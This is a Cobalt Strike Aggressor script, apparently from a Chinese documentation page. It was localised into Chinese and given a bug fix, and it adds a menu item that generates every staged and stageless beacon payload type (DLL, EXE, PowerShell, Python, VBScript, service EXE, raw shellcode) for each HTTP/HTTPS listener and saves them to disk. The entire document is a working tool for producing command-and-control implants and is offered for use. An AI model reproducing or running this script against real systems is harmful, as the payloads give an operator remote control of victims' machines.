ArtifactPayloadGenerator.cna脚本bug修复
#Automatic Artifact Payload Generator
#Author: @r3dQu1nn
#更新:修复如果监听器名字没有http或https会生成失败的bug顺便汉化了一下 --by:WBG
#Generates every type of Stageless/Staged Payload based off a HTTP/HTTPS Listener
#Custom Directory for Payloads
mkdir("/opt/cobaltstrike/Staged_Payloads");
mkdir("/opt/cobaltstrike/Stageless_Payloads");
menubar("生成Payload", "payloadgenerator", 2);
popup payloadgenerator {
item "&有效载荷生成器" {
prompt_confirm("你想生成不同类型的Payload吗?", "Payload Generator Confirmation", {
show_message("正在生成Payload...");
payloadgenerate();
});
}
}
sub payloadgenerate {
foreach $name (listeners_local()) {
$original_listener = $name;
$listener_name = listener_info($name);
if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
#Staged Payloads
$data = artifact($original_listener, "dll");
$data1 = artifact($original_listener, "dllx64");
$data2 = artifact($original_listener, "exe");
$data3 = artifact($original_listener, "powershell");
$data4 = artifact($original_listener, "python");
$data5 = artifact($original_listener, "svcexe");
$data6 = artifact($original_listener, "vbscript");
#Write and Save Payloads
$handle = openf(">/opt/cobaltstrike/Staged_Payloads/dllpayload.dll");
writeb($handle, $data);
closef($handle);
$handle1 = openf(">/opt/cobaltstrike/Staged_Payloads/dllx64payload.dll");
writeb($handle1, $data1);
closef($handle1);
$handle2 = openf(">/opt/cobaltstrike/Staged_Payloads/exepayload.exe");
writeb($handle2, $data2);
closef($handle2);
$handle3 = openf(">/opt/cobaltstrike/Staged_Payloads/powershellpayload.ps1");
writeb($handle3, $data3);
closef($handle3);
$handle4 = openf(">/opt/cobaltstrike/Staged_Payloads/pythonpayload.py");
writeb($handle4, $data4);
closef($handle4);
$handle5 = openf(">/opt/cobaltstrike/Staged_Payloads/svcexepayload.exe");
writeb($handle5, $data5);
closef($handle5);
$handle6 = openf(">/opt/cobaltstrike/Staged_Payloads/vbspayload.vbs");
writeb($handle6, $data6);
closef($handle6);
#Stageless Payloads
artifact_stageless($original_listener, "dll", "x86", "", &dll);
artifact_stageless($original_listener, "dllx64", "x86", "", &dllx64);
artifact_stageless($original_listener, "exe", "x86", "", &exe);
artifact_stageless($original_listener, "powershell", "x86", "", &ps1);
artifact_stageless($original_listener, "raw", "x86", "", &raw);
artifact_stageless($original_listener, "svcexe", "x86", "", &svcexe);
}
else{
show_message("没有找到http或https监听器");
}
}
}
sub dll {
#Write and Save Payload
local('$cradle');
$cradle = openf(">/opt/cobaltstrike/Stageless_Payloads/dllpayload.dll");
writeb($cradle, $1);
closef($cradle);
}
sub dllx64 {
#Write and Save Payload
local('$cradle1');
$cradle1 = openf(">/opt/cobaltstrike/Stageless_Payloads/dllx64payload.dll");
writeb($cradle1, $1);
closef($cradle1);
}
sub exe {
#Write and Save Payload
local('$cradle2');
$cradle2 = openf(">/opt/cobaltstrike/Stageless_Payloads/exepayload.exe");
writeb($cradle2, $1);
closef($cradle2);
}
sub ps1 {
#Write and Save Payload
local('$cradle3');
$cradle3 = openf(">/opt/cobaltstrike/Stageless_Payloads/powershellpayload.ps1");
writeb($cradle3, $1);
closef($cradle3);
}
sub raw {
#Write and Save Payload
local('$cradle4');
$cradle4 = openf(">/opt/cobaltstrike/Stageless_Payloads/rawpayload.bin");
writeb($cradle4, $1);
closef($cradle4);
}
sub svcexe {
#Write and Save Payload
local('$cradle5');
$cradle5 = openf(">/opt/cobaltstrike/Stageless_Payloads/svcexepayload.exe");
writeb($cradle5, $1);
closef($cradle5);
if (-exists "/opt/cobaltstrike/Stageless_Payloads/svcexepayload.exe") {
show_message("已生成并保存所有分阶段和无阶段有效负载。");
show_message("保存在 /opt/cobaltstrike/Staged_Payloads/ \n /opt/cobaltstrike/Stageless_Payloads/ ");
}
}
最后更新于
这有帮助吗?